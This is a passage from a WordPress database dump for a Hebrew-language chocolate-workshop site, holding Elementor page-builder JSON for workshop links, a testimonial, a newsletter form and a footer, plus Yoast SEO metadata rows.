ion_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(972,197,'_elementor_version','0.4'),(975,199,'_edit_last','1'),(976,199,'_edit_lock','1575664814:1'),(983,199,'_wp_page_template','default'),(984,199,'_yoast_wpseo_title','קורס שוקולד למתחילים - שוקולד4U'),(985,199,'_yoast_wpseo_metadesc','כשהשוקולד מוכן לעבודה, המשתתפים בקורס שוקולד למתחילים מקבלים הזדמנות להבין את השלבים בקורס ומתחילים עם הכנת מילויים שונים לפרלינים. למידע נוסף היכנסו לאתר.'),(986,199,'_elementor_edit_mode','builder'),(990,199,'_elementor_template_type','post'),(996,203,'_elementor_template_type','page'),(997,203,'_elementor_edit_mode','builder'),(998,204,'_elementor_template_type','page'),(999,204,'_elementor_edit_mode','builder'),(1000,203,'_wp_page_template','default'),(1001,203,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" 